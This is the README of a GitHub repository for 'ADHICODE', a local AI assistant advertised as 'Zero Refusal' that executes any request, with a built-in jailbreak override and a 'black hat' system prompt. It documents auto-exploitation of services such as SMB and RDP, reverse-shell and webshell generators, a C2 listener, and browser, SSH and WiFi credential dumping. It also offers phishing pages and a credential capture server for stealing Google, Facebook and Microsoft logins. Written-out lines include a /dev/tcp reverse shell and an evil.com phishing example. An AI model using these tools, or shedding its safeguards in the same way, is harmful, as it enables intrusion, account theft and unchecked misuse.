Skip to content

AdhiHub/ADHICODE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

56 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

ADHICODE

Terminal AI Assistant — Zero Refusal. Full Privacy. Runs 100% Offline.

  █████╗ ██████╗ ██╗  ██╗██╗ ██████╗ ██████╗ ██████╗ ███████╗
  ██╔══██╗██╔══██╗██║  ██║██║██╔════╝██╔═══██╗██╔══██╗██╔════╝
  ███████║██║  ██║███████║██║██║     ██║   ██║██║  ██║█████╗
  ██╔══██║██║  ██║██╔══██║██║██║     ██║   ██║██║  ██║██╔══╝
  ██║  ██║██████╔╝██║  ██║██║╚██████╗╚██████╔╝██████╔╝███████╗
  ╚═╝  ╚═╝╚═════╝ ╚═╝  ╚═╝╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝

Powered by AdhiHub


What Is This?

ADHICODE is a terminal-based AI assistant that runs 100% locally on your machine. No cloud, no API keys, no tracking, no data leaving your device. Built for penetration testers, security researchers, and power users who need unrestricted AI assistance.

  • Zero Refusal — executes any request, no warnings, no disclaimers
  • Fully Offline — after one-time model download, works without internet
  • Offensive Security Suite — auto-recon, exploitation, C2, phishing, nuclei scanning, post-exploitation
  • Dark Web Integration — Tor routing, .onion fetch, circuit rotation
  • Smart Setup — detects your RAM & platform, recommends the best model
  • Multiple Models — choose from 5 models (1B to 8B parameters)
  • Cross-Platform — Windows, Linux, macOS, Termux (Android), WSL
  • Tab Completion — press Tab to auto-complete commands
  • Session Saving — auto-saves conversations across restarts

Quick Setup (First Time)

One-Line Install

Linux / Termux / macOS:

curl -fsSL https://raw.githubusercontent.com/AdhiHub/ADHICODE/main/install.sh | bash

Windows PowerShell:

iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/AdhiHub/ADHICODE/main/install.ps1'))

Manual Install

git clone -b main https://github.com/AdhiHub/ADHICODE.git
cd ADHICODE
pip install -r requirements.txt
python adhicode.py

What happens on first run: ADHICODE launches a setup wizard — detects your RAM/CPU, recommends the best model, and downloads it (~1-8GB one-time). After that, you're in the chat.


How to Run ADHICODE Again (After Install)

After the first setup, ADHICODE is already on your machine. Just:

cd ADHICODE
python adhicode.py

That's it. No install, no download, no internet needed — it starts instantly and loads your saved model.

Windows quick-launch:

adhicode.bat

Shortcut (Linux/macOS): Add this alias to your ~/.bashrc:

alias adhicode='cd ~/ADHICODE && python3 adhicode.py'

Then just type adhicode in terminal.

Shortcut (Windows): Create adhicode.cmd anywhere on your PATH:

@python C:\Users\YOURNAME\ADHICODE\adhicode.py %*

First Run (Setup Wizard)

When you run python adhicode.py for the first time, it:

  1. Detects your system — shows platform, architecture, RAM
  2. Recommends a model — picks the best fit for your RAM
  3. Shows setup wizard — select model, mode, temperature, Tor (optional)
  4. Downloads the model — one-time download with progress bar
  5. Starts the chat — ready to go
──────────────────────────────────────────────────
  ADHICODE Local model: qwen-2.5-7b... │ temp:0.7
──────────────────────────────────────────────────
  ADHICODE ready. Ask me anything.  • /help for commands

ADHICODE ›

Available Models

Model Size RAM Needed Best For
Llama 3.2 1B Q4 (default) ~800MB 2GB Termux phones, low-end PCs
Llama 3.2 3B Q4 ~2GB 3GB Mid-range phones/laptops
Qwen 2.5 7B Q4 ~4.5GB 6GB Desktops, quality responses
Dolphin 2.9 Llama 3 8B Q4 ~4.9GB 8GB Powerful desktops (uncensored)
Mistral 7B Q4 ~4.1GB 6GB Coding tasks

Change model after setup: Use /feedback inside ADHICODE or run python adhicode.py --download.


Platform Support

ADHICODE is designed and tested to run on all major platforms. Every commit is syntax-checked and compatibility-audited.

Platform Status Details
Termux (Android) ✅ Full support pkg install package manager, $TMPDIR temp paths, no sudo needed
Linux (Ubuntu/Debian/Kali) ✅ Full support sudo apt install, /proc/meminfo RAM detection
Windows 10/11 (PowerShell) ✅ Full support winget installs, ctypes RAM detection, .exe binary suffixes, cls clear screen
macOS ✅ Intel & Apple Silicon sysctl RAM fallback
WSL ✅ Full support Shares Linux compatibility layer

Compatibility layer: core/platform.py auto-detects the OS and adapts:

  • Package manager: apt (Linux) / pkg (Termux) / winget (Windows)
  • Temp directory: /tmp/ (Linux) / $TMPDIR (Termux) / %TEMP% (Windows)
  • Binary names: nuclei (Unix) / nuclei.exe (Windows)
  • Clear screen: clear (Unix) / cls (Windows)
  • Privilege escalation: Linux checks (SUID, cron, docker) / Windows checks (whoami /priv, net user, sc query)
  • Credential dumps: Linux paths (Chrome Linux, bash history, SSH keys) / Windows paths (Chrome Windows, PowerShell history, cmdkey)

Commands Reference

General Commands

Command What It Does
hi / any text Chat with the AI
/help Show all commands
/clear Clear screen
/save Save conversation
/new Start fresh chat
/model Show current model/settings
/feedback Change mode, temperature, model
/download Download a new model
/banner Print ASCII banner
/report Generate pentest report from conversation
/tui Launch Textual TUI interface (split-pane, animated)
/exit Quit (auto-saves)

TUI Mode (Textual Interface)

ADHICODE includes a full TUI built with textual:

  Launch: python adhicode.py --tui
  Or type: /tui  (from within CLI)

Features:

  • Red banner header (collapsible with Ctrl+B)
  • Split panes: CHAT (left) + OUTPUT (right)
  • Live scan animation — sweeping radar line during recon/nuclei
  • Spinner — animated status indicator during scans
  • Real-time streaming — tool output streams into the output pane
  • Status bar — model, mode, Tor status, C2 count
  • Command history — Up/Down arrows to recall commands
  • Full keyboard control — no mouse needed

Modes

  • Default (Balanced) — helpful, direct, zero refusal
  • Expert (Technical) — concise, advanced answers
  • Creative (Unfiltered) — imaginative, no limits

Offensive Security Commands

/recon <target> — Auto Reconnaissance

Scans targets and discovers live hosts with open ports. Supports multiple target formats.

Target formats:

  • CIDR notation: /recon 192.168.1.0/24
  • Dash range: /recon 10.0.0.1-254
  • Comma list: /recon 192.168.1.1,192.168.1.2
  • Single IP: /recon 192.168.1.1
  • Hostname: /recon scanme.nmap.org

What it does:

  1. Ping sweep to find live hosts (multi-threaded)
  2. Port scan on live hosts (common ports)
  3. Service detection via banner grab
  4. Outputs hostname (if available) for each live host

/pwn <target> — Auto-Exploitation

Full auto-pwn pipeline: recon + service detection + exploitation.

Usage:

/pwn 192.168.1.1
/pwn scanme.nmap.org
/pwn 10.0.0.5

What it does:

  1. Ping check (target must be alive)
  2. Port scan for 30+ common ports
  3. Service detection (banner grab)
  4. Auto-exploit matching services (25+ exploits):
Service Ports Exploit
SSH 22 Brute-force via hydra
HTTP/HTTPS 80,443,8080,8443 Log4j, Struts2, Spring4Shell, WebLogic
MySQL 3306 Brute-force + CVE-2012-2122
SMB 139,445 EternalBlue MS17-010
RDP 3389 BlueKeep CVE-2019-0708
FTP 21 Anonymous check + brute-force
Redis 6379 Unauthenticated RCE
Elasticsearch 9200 CVE-2014-3120
Docker 2375,2376 Unauthenticated RCE
Jenkins 8080 Unauthenticated RCE
Kafka 9092 Unauthenticated access
Consul 8500 RCE
VNC 5900,5901 Unauthenticated access
SNMP 161 Community string brute-force
NFS 2049 Show mounts
SMTP 25 User enumeration
rsync 873 Anonymous access

/nuclei <target> [category] — CVE Template Scanner

Runs Nuclei (if installed) with 10,000+ CVE templates.

Usage:

/nuclei scanme.nmap.org              # default: cve category
/nuclei scanme.nmap.org critical     # critical/high severity only
/nuclei scanme.nmap.org tech         # technology detection
/nuclei scanme.nmap.org misconfig    # misconfigurations
/nuclei scanme.nmap.org exposure     # sensitive file exposure
/nuclei scanme.nmap.org all          # all categories

Categories:

Category Description
cves (default) 10,000+ CVE templates (RCE, SQLi, XSS, etc.)
critical Critical/high severity vulns
tech Framework, CMS, server detection
misconfig Default creds, open buckets, debug endpoints
exposure Sensitive files, .git, .env, backups
all All categories combined

If Nuclei is not installed, it attempts to auto-install via Go.


/phish <cmd> [args] — Phishing Campaign Generator

Generates branded phishing landing pages, email lures, and runs a local credential capture server.

Commands:

/phish list                                    List all available templates
/phish page <template> <callback_url>          Generate phishing HTML page
/phish email <template> <name> <phish_url>     Generate phishing email
/phish serve <template> [port]                 Serve page and capture creds

Examples:

/phish page google http://your-server.com/capture.php
/phish email password_reset John http://evil.com/login
/phish serve google 8080                       # Captures POST data in terminal

Available page templates:

Template Name Use Case
google Google Login Steal Gmail creds
facebook Facebook Login Steal Facebook creds
instagram Instagram Login Steal Instagram creds
microsoft Microsoft 365 Steal Office creds
linkedin LinkedIn Login Steal LinkedIn creds
generic Generic Login Customizable branded page

Available email templates:

Template Subject
password_reset Security Alert: Password Reset Required
invoice Invoice #{num} - Payment Overdue
account_verify Action Required: Verify Your Account
package_delivery Package Delivery Notification

Capture server: When you run /phish serve, it starts an HTTP server on the specified port. Any credentials submitted via POST are displayed in your terminal.


/exploit — CVE Exploit Scripts

Generate and run exploit scripts for specific CVEs.

Usage:

/exploit ms17-010 <target>                EternalBlue (SMB)
/exploit bluekeep <target>                BlueKeep (RDP)
/exploit log4j <target> <payload>         Log4Shell
/exploit struts2 <target> <cmd>           Apache Struts2 RCE
/exploit spring4j <target> <cmd>          Spring4Shell
/exploit weblogic <target> <cmd>          WebLogic RCE

/payload <type> <lhost> <lport> — Payload Generator

Generates reverse shell commands and webshells ready to paste.

Usage:

/payload bash 192.168.1.100 4444
/payload python 10.0.0.5 5555
/payload php 192.168.1.100 4444
/payload perl 192.168.1.100 5555
/payload powershell 192.168.1.100 4444
/payload msf_linux 192.168.1.100 4444
/payload msf_windows 192.168.1.100 4444
/payload msf_android 192.168.1.100 4444
/payload webshell_php
/payload webshell_asp
/payload webshell_jsp

Types:

  • bash — Bash reverse shell (bash -i >& /dev/tcp/...)
  • python — Python reverse shell
  • php — PHP reverse shell
  • perl — Perl reverse shell
  • powershell — PowerShell reverse shell
  • msf_linux — msfvenom Linux ELF reverse TCP
  • msf_windows — msfvenom Windows EXE reverse TCP
  • msf_android — msfvenom Android APK reverse TCP
  • webshell_php — PHP webshell (single file)
  • webshell_asp — ASP webshell
  • webshell_jsp — JSP webshell

/c2 <action> [args] — Command & Control

Built-in C2 listener with session management and beacon generation.

Commands:

/c2 listen <port>                  Start reverse shell listener
/c2 sessions                       List active sessions
/c2 send <session_id> <command>    Send command to session
/c2 beacon <lhost> <lport>         Generate PowerShell beacon
/c2 stop                           Stop the listener

Example workflow:

/c2 listen 4444                             # Start listener
# In target shell: bash -i >& /dev/tcp/YOU/4444 0>&1
/c2 sessions                                 # See connected sessions
/c2 send 1 whoami                            # Run command on target

The listener runs in a background thread so you can continue using ADHICODE while it's active.


/privesc — Privilege Escalation Checks

Automated privilege escalation enumeration for Linux targets.

Usage:

/privesc

What it checks:

  • SUID binaries (find + known exploit SUIDs)
  • Sudo -l permissions
  • Writable /etc/passwd
  • Kernel exploits (DirtyPipe, PwnKit, CVE-2021-4034)
  • Docker group membership
  • LXD group membership
  • Writable cron jobs
  • World-writable SUID scripts
  • Capabilities with setuid+ep

/cred — Credential Harvesting

Extract saved credentials from the local system.

Usage:

/cred

What it dumps:

  • Chrome saved passwords (via SQLite)
  • Firefox saved passwords (via logins.json)
  • SSH private keys from ~/.ssh
  • Bash/Zsh history (potential passwords/keys)
  • AWS credentials from ~/.aws
  • .env files with secrets
  • Generic credential files in common locations

/wifi — WiFi Password Dump

Extracts saved WiFi passwords from the local system.

Usage:

/wifi

Supported:

  • Linux: nmcli or /etc/NetworkManager/system-connections/
  • Windows: netsh wlan show profiles
  • macOS: security find-generic-password

/tools — Security Tools Manager

Check, install, and run 25+ penetration testing tools from within ADHICODE.

Usage:

/tools                         List all available tools and their status
/tools run nmap -sV <target>   Run a specific tool

Supported tools: nmap, hydra, sqlmap, msfvenom, msfconsole, john, hashcat, aircrack-ng, bettercap, whatweb, gobuster, dirb, nikto, wpscan, enum4linux, smbclient, impacket, redis-cli, mysql, ssh, ftp, sslscan, nuclei, searchsploit, netcat.


/dark <action> [args] — Dark Web / Tor Integration

Connect to Tor, fetch .onion pages, rotate circuits.

Commands:

/dark start              Start Tor service
/dark stop               Stop Tor service
/dark status             Check Tor status
/dark ip                 Show current Tor exit IP
/dark newid              Request new Tor circuit (Newnym)
/dark fetch <onion_url>  Fetch .onion page via Tor

Examples:

/dark start
/dark fetch http://zqktlwi4fecvo6ri.onion      # Tor hidden wiki
/dark fetch http://darkfailenbsdla5.onion        # Dark.fail
/dark newid                                      # Rotate circuit
/dark status                                     # Verify Tor is running

Requirements: Tor must be installed (apt install tor or /dark start attempts auto-install).


/report — Generate Pentest Report

Generates a comprehensive pentest report from the current conversation session.

Usage:

/report

Output:

  • pentest_report_<session_name>.txt in the current directory
  • Contains: timestamp, session info, full transcript, key findings (IPs, domains, credentials, ports, CVEs), and summary

Example Workflows

Full Pentest Chain:

/recon 192.168.1.0/24                    # Find targets
/pwn 192.168.1.5                         # Auto-exploit a target
/c2 listen 4444                          # Set up C2 listener
# (On target via your exploit): bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
/c2 sessions                             # Interact with session
/privesc                                 # Escalate privileges
/cred                                    # Dump credentials
/report                                  # Generate report

Web App Assessment:

/nuclei https://target.com critical      # Find critical CVEs
/nuclei https://target.com exposures     # Find sensitive files
/exploit log4j https://target.com        # Test Log4Shell
/phish page google http://your-server.com  # Clone login page
/phish serve google 8080                 # Capture creds

Dark Web Recon:

/dark start                              # Start Tor
/dark status                             # Verify Tor
/dark fetch http://someonion.onion       # Browse .onion
/dark newid                              # Anonymity refresh

Troubleshooting

llama-cpp-python fails to install:

# Windows
pip install llama-cpp-python --only-binary=llama-cpp-python

# Linux
sudo apt install build-essential cmake

# Termux
pkg install cmake build-essential

Need help? Open an issue at https://github.com/AdhiHub/ADHICODE/issues


Architecture

ADHICODE/
├── adhicode.py              # Main CLI — header, commands, tab-completion
├── adhicode.bat             # Windows launcher
├── requirements.txt         # Python dependencies
├── install.sh               # Linux / Termux / macOS installer
├── install.ps1              # Windows installer
├── termux-install.sh        # Termux-specific installer
├── README.md                # This file
├── core/                    # Core modules (see below)
└── tui/                     # Textual TUI interface
    ├── __init__.py
    ├── app.py               # Main TUI app — banners, panes, animations, commands
    └── styles.tcss          # Dark theme CSS
    ├── __init__.py
    ├── engine.py            # AI engine — GGUF models + Ollama + 5-level jailbreak override
    ├── setup.py             # Setup wizard — system detection, model select
    ├── context.py           # Black hat system prompt + model definitions
    ├── downloader.py        # Model downloader with progress bar
    ├── memory.py            # Conversation memory with auto-trim
    ├── utils.py             # Banner, colors, UI helpers
    ├── tor.py               # Tor check, install, .onion fetch, circuit rotation
    ├── exploit.py           # Auto-pwn engine — 25+ services, CVE exploit scripts
    ├── payload.py           # Reverse shell + web shell generator
    ├── tools.py             # Tool executor — auto-install 25+ pentest tools
    ├── c2.py                # C2 listener, session management, beacons
    ├── postexploit.py       # Privesc checks, credential dumps, persistence
    ├── recon.py             # Auto-recon — CIDR/dash/comma, ping+port scan
    ├── reporter.py          # Pentest report generator
    ├── nuclei.py            # Nuclei CVE template scanner (10K+ templates)
    └── phish.py             # Phishing campaign module (pages, emails, capture server)

Brand: AdhiHub GitHub: https://github.com/AdhiHub/ADHICODE Branch: main (stable) | dev (experimental)

About

ADHICODE - Terminal AI Assistant. Zero Refusal. Full Privacy. Runs 100% Offline.

Resources

Stars

2 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors